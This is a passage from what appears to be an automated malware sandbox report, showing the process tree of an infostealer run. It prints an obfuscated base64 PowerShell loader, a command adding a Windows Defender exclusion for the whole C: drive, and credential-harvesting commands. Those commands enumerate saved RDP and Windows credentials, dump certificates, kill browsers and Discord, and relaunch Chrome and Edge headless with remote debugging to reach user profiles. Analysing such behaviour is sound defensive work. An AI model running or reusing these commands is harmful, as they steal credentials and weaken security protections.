JJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                          8⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • Drops startup file
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: AddClipboardFormatListener
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:6132
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                            9⤵
                            • Command and Scripting Interpreter: PowerShell
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5512
                    • C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe
                      "C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"
                      6⤵
                      • Executes dropped EXE
                      • Enumerates connected drives
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1448
                      • C:\Windows\system32\cmd.exe
                        "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_3827778529.txt\""
                        7⤵
                        • NTFS ADS
                        PID:3928
                      • C:\Windows\system32\net.exe
                        "net" statistics workstation
                        7⤵
                          PID:2832
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 statistics workstation
                            8⤵
                              PID:3840
                          • C:\Windows\system32\vaultcmd.exe
                            "vaultcmd" /list
                            7⤵
                              PID:5400
                            • C:\Windows\system32\tasklist.exe
                              "tasklist"
                              7⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3956
                            • C:\Windows\system32\tasklist.exe
                              "tasklist"
                              7⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4916
                            • C:\Windows\system32\tasklist.exe
                              "tasklist" /FO CSV /NH
                              7⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4460
                            • C:\Windows\system32\cmdkey.exe
                              "cmdkey" /list
                              7⤵
                                PID:2080
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4308
                                • C:\Windows\system32\cmdkey.exe
                                  "C:\Windows\system32\cmdkey.exe" /list
                                  8⤵
                                    PID:2096
                                • C:\Windows\system32\tasklist.exe
                                  "tasklist"
                                  7⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1268
                                • C:\Windows\system32\certutil.exe
                                  "certutil" -store My
                                  7⤵
                                    PID:5312
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    7⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1192
                                  • C:\Windows\system32\certutil.exe
                                    "certutil" -store -user My
                                    7⤵
                                      PID:5828
                                    • C:\Windows\system32\tasklist.exe
                                      "tasklist"
                                      7⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3804
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
                                      7⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2704
                                    • C:\Windows\system32\tasklist.exe
                                      "tasklist"
                                      7⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3552
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
                                      7⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Hide Artifacts: Ignore Process Interrupts
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2248
                                    • C:\Windows\system32\tasklist.exe
                                      "tasklist"
                                      7⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:312
                                    • C:\Windows\system32\cmdkey.exe
                                      "cmdkey" /list
                                      7⤵
                                        PID:4684
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist"
                                        7⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5672
                                      • C:\Windows\system32\cmdkey.exe
                                        "cmdkey" /list:TERMSRV/69.48.201.74
                                        7⤵
                                          PID:5764
                                        • C:\Windows\system32\tasklist.exe
                                          "tasklist"
                                          7⤵
                                          • Enumerates processes with tasklist
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4448
                                        • C:\Windows\system32\tasklist.exe
                                          "tasklist"
                                          7⤵
                                          • Enumerates processes with tasklist
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3232
                                        • C:\Windows\system32\taskkill.exe
                                          "taskkill" /IM chrome.exe
                                          7⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2608
                                        • C:\Windows\system32\tasklist.exe
                                          "tasklist"
                                          7⤵
                                          • Enumerates processes with tasklist
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4600
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            8⤵
                                              PID:4700
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /IM msedge.exe
                                            7⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2704
                                          • C:\Windows\system32\tasklist.exe
                                            "tasklist"
                                            7⤵
                                            • Enumerates processes with tasklist
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4172
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /IM brave.exe
                                            7⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5512
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /IM opera.exe
                                            7⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:872
                                          • C:\Windows\system32\tasklist.exe
                                            "tasklist"
                                            7⤵
                                            • Enumerates processes with tasklist
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1060
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /IM vivaldi.exe
                                            7⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6008
                                          • C:\Windows\system32\tasklist.exe
                                            "tasklist"
                                            7⤵
                                            • Enumerates processes with tasklist
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:408
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /IM firefox.exe
                                            7⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1852
                                          • C:\Windows\system32\tasklist.exe
                                            "tasklist"
                                            7⤵
                                            • Enumerates processes with tasklist
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5596
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /IM dragon.exe
                                            7⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3968
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /F /IM chrome.exe
                                            7⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:716
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /IM maxthon.exe
                                            7⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4060
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /F /IM Discord.exe
                                            7⤵
                                            • Kills process with taskkill
                                            PID:4232
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /IM uc_browser.exe
                                            7⤵
                                              PID:2672
                                            • C:\Windows\system32\taskkill.exe
                                              "taskkill" /F /IM DiscordCanary.exe
                                              7⤵
                                                PID:3508
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM slimjet.exe
                                                7⤵
                                                • Kills process with taskkill
                                                PID:4000
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM DiscordPTB.exe
                                                7⤵
                                                • Kills process with taskkill
                                                PID:380
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM cent_browser.exe
                                                7⤵
                                                • Kills process with taskkill
                                                PID:3116
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM DiscordDevelopment.exe
                                                7⤵
                                                • Kills process with taskkill
                                                PID:5288
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM epic.exe
                                                7⤵
                                                  PID:2780
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /IM torch.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:640
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /IM whale.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:5124
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /IM 360browser.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:3692
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /IM qqbrowser.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:4476
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /IM browser.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:1792
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM chrome.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:4916
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM msedge.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:2096
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM brave.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:3928
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM opera.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:2916
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM vivaldi.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:3612
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM firefox.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:4232
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM dragon.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:4668
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM maxthon.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:5992
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM uc_browser.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:384
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM slimjet.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:1904
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM cent_browser.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:5540
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM epic.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:4600
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM torch.exe
                                                  7⤵
                                                    PID:4944
                                                  • C:\Windows\system32\taskkill.exe
                                                    "taskkill" /F /IM whale.exe
                                                    7⤵
                                                      PID:212
                                                    • C:\Windows\system32\taskkill.exe
                                                      "taskkill" /F /IM 360browser.exe
                                                      7⤵
                                                      • Kills process with taskkill
                                                      PID:5184
                                                    • C:\Windows\system32\taskkill.exe
                                                      "taskkill" /F /IM qqbrowser.exe
                                                      7⤵
                                                      • Kills process with taskkill
                                                      PID:4392
                                                    • C:\Windows\system32\taskkill.exe
                                                      "taskkill" /F /IM browser.exe
                                                      7⤵
                                                      • Kills process with taskkill
                                                      PID:2516
                                                    • C:\Windows\system32\tasklist.exe
                                                      "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                      7⤵
                                                      • Enumerates processes with tasklist
                                                      PID:4920
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=41380 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default
                                                      7⤵
                                                      • Uses browser remote debugging
                                                      • Checks processor information in registry
                                                      • Enumerates system info in registry
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:4524
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc855adcf8,0x7ffc855add04,0x7ffc855add10
                                                        8⤵
                                                          PID:5812
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2056,i,2350806159832935269,6394429083606343703,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2044 /prefetch:2
                                                          8⤵
                                                          • Modifies registry class
                                                          PID:5892
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2528,i,2350806159832935269,6394429083606343703,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2476 /prefetch:3
                                                          8⤵
                                                            PID:4460
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2916,i,2350806159832935269,6394429083606343703,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2900 /prefetch:8
                                                            8⤵
                                                              PID:5828
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41380 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,2350806159832935269,6394429083606343703,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2404 /prefetch:1
                                                              8⤵
                                                              • Uses browser remote debugging
                                                              PID:1600
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41380 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,2350806159832935269,6394429083606343703,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3136 /prefetch:1
                                                              8⤵
                                                              • Uses browser remote debugging
                                                              PID:1352
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41380 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3968,i,2350806159832935269,6394429083606343703,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3864 /prefetch:1
                                                              8⤵
                                                              • Uses browser remote debugging
                                                              PID:5528
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4568,i,2350806159832935269,6394429083606343703,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4564 /prefetch:8
                                                              8⤵
                                                                PID:6016
                                                            • C:\Windows\system32\tasklist.exe
                                                              "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                              7⤵
                                                              • Enumerates processes with tasklist
                                                              PID:4880
                                                            • C:\Windows\system32\taskkill.exe
                                                              "taskkill" /F /IM chrome.exe
                                                              7⤵
                                                              • Kills process with taskkill
                                                              PID:4400
                                                            • C:\Windows\system32\tasklist.exe
                                                              "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                              7⤵
                                                              • Enumerates processes with tasklist
                                                              PID:5796
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=40100 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default
                                                              7⤵
                                                              • Uses browser remote debugging
                                                              • Enumerates system info in registry
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:4976
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x230,0x234,0x238,0x22c,0x258,0x7ffc8421f208,0x7ffc8421f214,0x7ffc8421f220
                                                                8⤵
                                                                  PID:5980
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2604,i,1576189636601185316,4349882568179383720,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2596 /prefetch:2
                                                                  8⤵
                                                                  • Modifies registry class
                                                                  PID:1168
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3084,i,1576189636601185316,4349882568179383720,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3040 /prefetch:3
                                                                  8⤵
                                                                    PID:3516
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3168,i,1576189636601185316,4349882568179383720,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3160 /prefetch:8
                                                                    8⤵
                                                                      PID:5780
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=40100 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3388,i,1576189636601185316,4349882568179383720,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3384 /prefetch:1
                                                                      8⤵
                                                                      • Uses browser remote debugging
                                                                      PID:1224
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=40100 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3628,i,1576189636601185316,4349882568179383720,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3620 /prefetch:1
                                                                      8⤵
                                                                      • Uses browser remote debugging
                                                                      PID:4036
                                                                  • C:\Windows\system32\tasklist.exe
                                                                    "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                                    7⤵
                                                                    • Enumerates processes with tasklist
                                                                    PID:5972
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    "taskkill" /IM chrome.exe
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    PID:6448
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    "taskkill" /IM msedge.exe
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    PID:4528
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    "taskkill" /IM brave.exe
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    PID:7652
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    "taskkill" /IM opera.exe
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    PID:7328
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    "taskkill" /IM vivaldi.exe
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    PID:7980
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    "taskkill" /IM firefox.exe
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    PID:7916
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    "taskkill" /IM dragon.exe
                                                                    7⤵
                                                                      PID:1700
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      "taskkill" /IM maxthon.exe
                                                                      7⤵
                                                                      • Kills process with taskkill
                                                                      PID:4988
                                                                    • C:\Windows\system32\taskkill.exe
